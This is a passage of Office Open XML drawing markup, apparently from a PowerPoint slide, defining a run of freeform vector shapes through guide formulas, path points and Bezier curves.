                  <a:moveTo>
                    <a:pt x="205" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="353"/>
                    <a:pt x="191" y="368"/>
                    <a:pt x="184" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="368"/>
                    <a:pt x="163" y="353"/>
                    <a:pt x="163" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="300"/>
                    <a:pt x="177" y="285"/>
                    <a:pt x="184" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="285"/>
                    <a:pt x="205" y="300"/>
                    <a:pt x="205" y="3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8" name="Freeform 1064">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8E5034-68B2-40AD-AE8C-373628EFD1AF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7583487" y="665163"/>
              <a:ext cx="93663" cy="84138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8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3 w 247"/>
                <a:gd name="T21" fmla="*/ 24 h 215"/>
                <a:gd name="T22" fmla="*/ 43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5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8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7"/>
                    <a:pt x="68" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="10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3" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4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5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8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9" name="Freeform 1065">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19298798-53D0-4A72-8647-BB405C542AA5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7796212" y="644525"/>
              <a:ext cx="115888" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 305 w 305"/>
                <a:gd name="T1" fmla="*/ 145 h 289"/>
                <a:gd name="T2" fmla="*/ 295 w 305"/>
                <a:gd name="T3" fmla="*/ 134 h 289"/>
                <a:gd name="T4" fmla="*/ 19 w 305"/>
                <a:gd name="T5" fmla="*/ 3 h 289"/>
                <a:gd name="T6" fmla="*/ 10 w 305"/>
                <a:gd name="T7" fmla="*/ 0 h 289"/>
                <a:gd name="T8" fmla="*/ 0 w 305"/>
                <a:gd name="T9" fmla="*/ 10 h 289"/>
                <a:gd name="T10" fmla="*/ 10 w 305"/>
                <a:gd name="T11" fmla="*/ 21 h 289"/>
                <a:gd name="T12" fmla="*/ 271 w 305"/>
                <a:gd name="T13" fmla="*/ 145 h 289"/>
                <a:gd name="T14" fmla="*/ 10 w 305"/>
                <a:gd name="T15" fmla="*/ 268 h 289"/>
                <a:gd name="T16" fmla="*/ 0 w 305"/>
                <a:gd name="T17" fmla="*/ 279 h 289"/>
                <a:gd name="T18" fmla="*/ 10 w 305"/>
                <a:gd name="T19" fmla="*/ 289 h 289"/>
                <a:gd name="T20" fmla="*/ 19 w 305"/>
                <a:gd name="T21" fmla="*/ 286 h 289"/>
                <a:gd name="T22" fmla="*/ 295 w 305"/>
                <a:gd name="T23" fmla="*/ 156 h 289"/>
                <a:gd name="T24" fmla="*/ 305 w 305"/>
                <a:gd name="T25" fmla="*/ 14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305" y="145"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="139"/>
                    <a:pt x="301" y="136"/>
                    <a:pt x="295" y="134"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19" y="3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3" y="17"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="271" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="268"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="272"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="285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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="295" y="156"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="153"/>
                    <a:pt x="305" y="151"/>
                    <a:pt x="305" y="14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0" name="Freeform 1066">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682B03BA-A111-412A-B12D-D8B433A1FDB8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8043862" y="631825"/>
              <a:ext cx="71438" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 184"/>
                <a:gd name="T1" fmla="*/ 291 h 301"/>
                <a:gd name="T2" fmla="*/ 168 w 184"/>
                <a:gd name="T3" fmla="*/ 280 h 301"/>
                <a:gd name="T4" fmla="*/ 108 w 184"/>
                <a:gd name="T5" fmla="*/ 280 h 301"/>
                <a:gd name="T6" fmla="*/ 108 w 184"/>
                <a:gd name="T7" fmla="*/ 105 h 301"/>
                <a:gd name="T8" fmla="*/ 93 w 184"/>
                <a:gd name="T9" fmla="*/ 89 h 301"/>
                <a:gd name="T10" fmla="*/ 19 w 184"/>
                <a:gd name="T11" fmla="*/ 89 h 301"/>
                <a:gd name="T12" fmla="*/ 4 w 184"/>
                <a:gd name="T13" fmla="*/ 100 h 301"/>
                <a:gd name="T14" fmla="*/ 19 w 184"/>
                <a:gd name="T15" fmla="*/ 110 h 301"/>
                <a:gd name="T16" fmla="*/ 83 w 184"/>
                <a:gd name="T17" fmla="*/ 110 h 301"/>
                <a:gd name="T18" fmla="*/ 83 w 184"/>
                <a:gd name="T19" fmla="*/ 280 h 301"/>
                <a:gd name="T20" fmla="*/ 15 w 184"/>
                <a:gd name="T21" fmla="*/ 280 h 301"/>
                <a:gd name="T22" fmla="*/ 0 w 184"/>
                <a:gd name="T23" fmla="*/ 291 h 301"/>
                <a:gd name="T24" fmla="*/ 15 w 184"/>
                <a:gd name="T25" fmla="*/ 301 h 301"/>
                <a:gd name="T26" fmla="*/ 168 w 184"/>
                <a:gd name="T27" fmla="*/ 301 h 301"/>
                <a:gd name="T28" fmla="*/ 184 w 184"/>
                <a:gd name="T29" fmla="*/ 291 h 301"/>
                <a:gd name="T30" fmla="*/ 110 w 184"/>
                <a:gd name="T31" fmla="*/ 21 h 301"/>
                <a:gd name="T32" fmla="*/ 90 w 184"/>
                <a:gd name="T33" fmla="*/ 0 h 301"/>
                <a:gd name="T34" fmla="*/ 69 w 184"/>
                <a:gd name="T35" fmla="*/ 21 h 301"/>
                <a:gd name="T36" fmla="*/ 90 w 184"/>
                <a:gd name="T37" fmla="*/ 41 h 301"/>
                <a:gd name="T38" fmla="*/ 110 w 184"/>
                <a:gd name="T39" fmla="*/ 2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1">
                  <a:moveTo>
                    <a:pt x="184" y="291"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="280"/>
                    <a:pt x="173" y="280"/>
                    <a:pt x="168" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="108" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="105"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="93"/>
                    <a:pt x="106" y="89"/>
                    <a:pt x="93" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19" y="89"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="89"/>
                    <a:pt x="4" y="89"/>
                    <a:pt x="4" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="110"/>
                    <a:pt x="14" y="110"/>
                    <a:pt x="19" y="110"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="280"/>
                    <a:pt x="0" y="280"/>
                    <a:pt x="0" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="301"/>
                    <a:pt x="10" y="301"/>
                    <a:pt x="15" y="301"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="301"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="301"/>
                    <a:pt x="184" y="301"/>
                    <a:pt x="184" y="291"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="110" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="9"/>
                    <a:pt x="101" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="0"/>
                    <a:pt x="69" y="9"/>
                    <a:pt x="69" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="32"/>
                    <a:pt x="78" y="41"/>
                    <a:pt x="90" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="110" y="32"/>
                    <a:pt x="110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1" name="Freeform 1067">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3440A30F-6655-4DE0-8849-2B1DAAE7737D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8131175" y="665163"/>
              <a:ext cx="95250" cy="84138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8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8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2" name="Freeform 1068">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD9A118-349F-48E6-894C-711944E5B81B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8231187" y="665163"/>
              <a:ext cx="90488" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 234 w 234"/>
                <a:gd name="T1" fmla="*/ 109 h 330"/>
                <a:gd name="T2" fmla="*/ 139 w 234"/>
                <a:gd name="T3" fmla="*/ 0 h 330"/>
                <a:gd name="T4" fmla="*/ 68 w 234"/>
                <a:gd name="T5" fmla="*/ 32 h 330"/>
                <a:gd name="T6" fmla="*/ 53 w 234"/>
                <a:gd name="T7" fmla="*/ 3 h 330"/>
                <a:gd name="T8" fmla="*/ 16 w 234"/>
                <a:gd name="T9" fmla="*/ 3 h 330"/>
                <a:gd name="T10" fmla="*/ 0 w 234"/>
                <a:gd name="T11" fmla="*/ 14 h 330"/>
                <a:gd name="T12" fmla="*/ 15 w 234"/>
                <a:gd name="T13" fmla="*/ 24 h 330"/>
                <a:gd name="T14" fmla="*/ 44 w 234"/>
                <a:gd name="T15" fmla="*/ 24 h 330"/>
                <a:gd name="T16" fmla="*/ 44 w 234"/>
                <a:gd name="T17" fmla="*/ 309 h 330"/>
                <a:gd name="T18" fmla="*/ 16 w 234"/>
                <a:gd name="T19" fmla="*/ 309 h 330"/>
                <a:gd name="T20" fmla="*/ 0 w 234"/>
                <a:gd name="T21" fmla="*/ 319 h 330"/>
                <a:gd name="T22" fmla="*/ 15 w 234"/>
                <a:gd name="T23" fmla="*/ 330 h 330"/>
                <a:gd name="T24" fmla="*/ 97 w 234"/>
                <a:gd name="T25" fmla="*/ 330 h 330"/>
                <a:gd name="T26" fmla="*/ 112 w 234"/>
                <a:gd name="T27" fmla="*/ 319 h 330"/>
                <a:gd name="T28" fmla="*/ 96 w 234"/>
                <a:gd name="T29" fmla="*/ 309 h 330"/>
                <a:gd name="T30" fmla="*/ 68 w 234"/>
                <a:gd name="T31" fmla="*/ 309 h 330"/>
                <a:gd name="T32" fmla="*/ 68 w 234"/>
                <a:gd name="T33" fmla="*/ 184 h 330"/>
                <a:gd name="T34" fmla="*/ 134 w 234"/>
                <a:gd name="T35" fmla="*/ 218 h 330"/>
                <a:gd name="T36" fmla="*/ 234 w 234"/>
                <a:gd name="T37" fmla="*/ 109 h 330"/>
                <a:gd name="T38" fmla="*/ 210 w 234"/>
                <a:gd name="T39" fmla="*/ 109 h 330"/>
                <a:gd name="T40" fmla="*/ 132 w 234"/>
                <a:gd name="T41" fmla="*/ 197 h 330"/>
                <a:gd name="T42" fmla="*/ 68 w 234"/>
                <a:gd name="T43" fmla="*/ 122 h 330"/>
                <a:gd name="T44" fmla="*/ 68 w 234"/>
                <a:gd name="T45" fmla="*/ 84 h 330"/>
                <a:gd name="T46" fmla="*/ 136 w 234"/>
                <a:gd name="T47" fmla="*/ 21 h 330"/>
                <a:gd name="T48" fmla="*/ 210 w 234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330">
                  <a:moveTo>
                    <a:pt x="234" y="109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="49"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="139" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="68" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68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9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="309"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="309"/>
                    <a:pt x="0" y="309"/>
                    <a:pt x="0" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="330"/>
                    <a:pt x="10" y="330"/>
                    <a:pt x="15" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="330"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="330"/>
                    <a:pt x="112" y="330"/>
                    <a:pt x="112" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="309"/>
                    <a:pt x="102" y="309"/>
                    <a:pt x="96" y="309"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68" y="309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="184"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="214"/>
                    <a:pt x="118" y="218"/>
                    <a:pt x="134" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="218"/>
                    <a:pt x="234" y="171"/>
                    <a:pt x="234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2" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="197"/>
                    <a:pt x="68" y="148"/>
                    <a:pt x="68" y="122"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68" y="84"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="51"/>
                    <a:pt x="101" y="21"/>
                    <a:pt x="136" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177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3" name="Freeform 1069">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0786717D-28DC-4A67-B636-DCCDD5CC2F0E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8331200" y="666750"/>
              <a:ext cx="95250" cy="82550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4 w 247"/>
                <a:gd name="T5" fmla="*/ 191 h 215"/>
                <a:gd name="T6" fmla="*/ 204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6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4" name="Freeform 1070">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76DE04AE-5BB6-4DC6-BA99-1BC90811E3A2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8434387" y="641350"/>
              <a:ext cx="79375" cy="107950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2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7 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 278"/>
                <a:gd name="T26" fmla="*/ 67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7 w 209"/>
                <a:gd name="T35" fmla="*/ 84 h 278"/>
                <a:gd name="T36" fmla="*/ 67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7" y="0"/>
                    <a:pt x="67" y="8"/>
                    <a:pt x="67" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67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7" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67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5" name="Freeform 1071">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6829DFBA-CE06-4853-8CE7-420410CC1322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1508125" y="896938"/>
              <a:ext cx="71438" cy="85725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59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1" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76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0"/>
                    <a:pt x="38" y="21"/>
                    <a:pt x="92" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="21"/>
                    <a:pt x="147" y="39"/>
                    <a:pt x="149" y="59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8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7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6" name="Freeform 1072">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F47B5A4-E44D-44CA-81E3-CFBE31600189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1604962" y="896938"/>
              <a:ext cx="76200" cy="85725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0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7" name="Freeform 1073">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728A9377-A602-4C49-8B8D-BB379E5BA838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1703387" y="896938"/>
              <a:ext cx="77788" cy="85725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0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8" name="Freeform 1074">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D6343D-87F1-4F21-B9D7-F390302D3CE2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1800225" y="862013"/>
              <a:ext cx="90488" cy="1206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3" y="0"/>
                    <a:pt x="123" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123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9" name="Freeform 1075">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F68D9B4-7D34-4280-B83E-D0299EC82D36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1901825" y="862013"/>
              <a:ext cx="82550" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 272 h 311"/>
                <a:gd name="T2" fmla="*/ 200 w 214"/>
                <a:gd name="T3" fmla="*/ 263 h 311"/>
                <a:gd name="T4" fmla="*/ 190 w 214"/>
                <a:gd name="T5" fmla="*/ 265 h 311"/>
                <a:gd name="T6" fmla="*/ 129 w 214"/>
                <a:gd name="T7" fmla="*/ 290 h 311"/>
                <a:gd name="T8" fmla="*/ 18 w 214"/>
                <a:gd name="T9" fmla="*/ 156 h 311"/>
                <a:gd name="T10" fmla="*/ 128 w 214"/>
                <a:gd name="T11" fmla="*/ 21 h 311"/>
                <a:gd name="T12" fmla="*/ 189 w 214"/>
                <a:gd name="T13" fmla="*/ 76 h 311"/>
                <a:gd name="T14" fmla="*/ 145 w 214"/>
                <a:gd name="T15" fmla="*/ 58 h 311"/>
                <a:gd name="T16" fmla="*/ 76 w 214"/>
                <a:gd name="T17" fmla="*/ 155 h 311"/>
                <a:gd name="T18" fmla="*/ 144 w 214"/>
                <a:gd name="T19" fmla="*/ 253 h 311"/>
                <a:gd name="T20" fmla="*/ 214 w 214"/>
                <a:gd name="T21" fmla="*/ 147 h 311"/>
                <a:gd name="T22" fmla="*/ 128 w 214"/>
                <a:gd name="T23" fmla="*/ 0 h 311"/>
                <a:gd name="T24" fmla="*/ 0 w 214"/>
                <a:gd name="T25" fmla="*/ 155 h 311"/>
                <a:gd name="T26" fmla="*/ 129 w 214"/>
                <a:gd name="T27" fmla="*/ 311 h 311"/>
                <a:gd name="T28" fmla="*/ 214 w 214"/>
                <a:gd name="T29" fmla="*/ 272 h 311"/>
                <a:gd name="T30" fmla="*/ 196 w 214"/>
                <a:gd name="T31" fmla="*/ 156 h 311"/>
                <a:gd name="T32" fmla="*/ 145 w 214"/>
                <a:gd name="T33" fmla="*/ 232 h 311"/>
                <a:gd name="T34" fmla="*/ 94 w 214"/>
                <a:gd name="T35" fmla="*/ 156 h 311"/>
                <a:gd name="T36" fmla="*/ 144 w 214"/>
                <a:gd name="T37" fmla="*/ 79 h 311"/>
                <a:gd name="T38" fmla="*/ 196 w 214"/>
                <a:gd name="T39" fmla="*/ 15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4" h="311">
                  <a:moveTo>
                    <a:pt x="214" y="272"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="263"/>
                    <a:pt x="203" y="263"/>
                    <a:pt x="200" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="263"/>
                    <a:pt x="192" y="263"/>
                    <a:pt x="190" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="284"/>
                    <a:pt x="148" y="290"/>
                    <a:pt x="129" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="290"/>
                    <a:pt x="18" y="232"/>
                    <a:pt x="18" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="76"/>
                    <a:pt x="73" y="21"/>
                    <a:pt x="128" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="21"/>
                    <a:pt x="170" y="27"/>
                    <a:pt x="189" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="67"/>
                    <a:pt x="161" y="58"/>
                    <a:pt x="145" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="58"/>
                    <a:pt x="76" y="101"/>
                    <a:pt x="76" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="213"/>
                    <a:pt x="109" y="253"/>
                    <a:pt x="144" y="253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="253"/>
                    <a:pt x="214" y="232"/>
                    <a:pt x="214" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="116"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="128" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="0"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="245"/>
                    <a:pt x="60" y="311"/>
                    <a:pt x="129" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="311"/>
                    <a:pt x="214" y="286"/>
                    <a:pt x="214" y="272"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="196" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="201"/>
                    <a:pt x="169" y="232"/>
                    <a:pt x="145" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="232"/>
                    <a:pt x="94" y="199"/>
                    <a:pt x="94" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="109"/>
                    <a:pt x="121" y="79"/>
                    <a:pt x="144" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="79"/>
                    <a:pt x="196" y="11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0" name="Freeform 1076">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4516C20A-205C-432F-A0C3-031BDEC9C7B5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1997075" y="862013"/>
              <a:ext cx="92075" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 241 w 241"/>
                <a:gd name="T1" fmla="*/ 11 h 309"/>
                <a:gd name="T2" fmla="*/ 225 w 241"/>
                <a:gd name="T3" fmla="*/ 0 h 309"/>
                <a:gd name="T4" fmla="*/ 173 w 241"/>
                <a:gd name="T5" fmla="*/ 0 h 309"/>
                <a:gd name="T6" fmla="*/ 157 w 241"/>
                <a:gd name="T7" fmla="*/ 11 h 309"/>
                <a:gd name="T8" fmla="*/ 187 w 241"/>
                <a:gd name="T9" fmla="*/ 21 h 309"/>
                <a:gd name="T10" fmla="*/ 123 w 241"/>
                <a:gd name="T11" fmla="*/ 288 h 309"/>
                <a:gd name="T12" fmla="*/ 119 w 241"/>
                <a:gd name="T13" fmla="*/ 289 h 309"/>
                <a:gd name="T14" fmla="*/ 54 w 241"/>
                <a:gd name="T15" fmla="*/ 21 h 309"/>
                <a:gd name="T16" fmla="*/ 85 w 241"/>
                <a:gd name="T17" fmla="*/ 11 h 309"/>
                <a:gd name="T18" fmla="*/ 69 w 241"/>
                <a:gd name="T19" fmla="*/ 0 h 309"/>
                <a:gd name="T20" fmla="*/ 16 w 241"/>
                <a:gd name="T21" fmla="*/ 0 h 309"/>
                <a:gd name="T22" fmla="*/ 0 w 241"/>
                <a:gd name="T23" fmla="*/ 11 h 309"/>
                <a:gd name="T24" fmla="*/ 29 w 241"/>
                <a:gd name="T25" fmla="*/ 21 h 309"/>
                <a:gd name="T26" fmla="*/ 97 w 241"/>
                <a:gd name="T27" fmla="*/ 294 h 309"/>
                <a:gd name="T28" fmla="*/ 121 w 241"/>
                <a:gd name="T29" fmla="*/ 309 h 309"/>
                <a:gd name="T30" fmla="*/ 144 w 241"/>
                <a:gd name="T31" fmla="*/ 294 h 309"/>
                <a:gd name="T32" fmla="*/ 213 w 241"/>
                <a:gd name="T33" fmla="*/ 21 h 309"/>
                <a:gd name="T34" fmla="*/ 241 w 241"/>
                <a:gd name="T35" fmla="*/ 1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1" h="309">
                  <a:moveTo>
                    <a:pt x="241" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="225" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="0"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="157" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="21"/>
                    <a:pt x="166" y="21"/>
                    <a:pt x="187" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="21"/>
                    <a:pt x="85" y="21"/>
                    <a:pt x="85" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="0"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="69" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="10" y="21"/>
                    <a:pt x="29" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="294"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="309"/>
                    <a:pt x="108" y="309"/>
                    <a:pt x="121" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="309"/>
                    <a:pt x="140" y="309"/>
                    <a:pt x="144" y="294"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="213" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="21"/>
                    <a:pt x="241" y="21"/>
                    <a:pt x="241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1" name="Freeform 1077">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D1D6B5-55FF-4B29-9517-C5255A481359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097087" y="862013"/>
              <a:ext cx="92075" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 242 w 242"/>
                <a:gd name="T1" fmla="*/ 295 h 305"/>
                <a:gd name="T2" fmla="*/ 215 w 242"/>
                <a:gd name="T3" fmla="*/ 284 h 305"/>
                <a:gd name="T4" fmla="*/ 215 w 242"/>
                <a:gd name="T5" fmla="*/ 21 h 305"/>
                <a:gd name="T6" fmla="*/ 242 w 242"/>
                <a:gd name="T7" fmla="*/ 11 h 305"/>
                <a:gd name="T8" fmla="*/ 227 w 242"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 198 w 242"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 174 w 242"/>
                <a:gd name="T13" fmla="*/ 17 h 305"/>
                <a:gd name="T14" fmla="*/ 122 w 242"/>
                <a:gd name="T15" fmla="*/ 179 h 305"/>
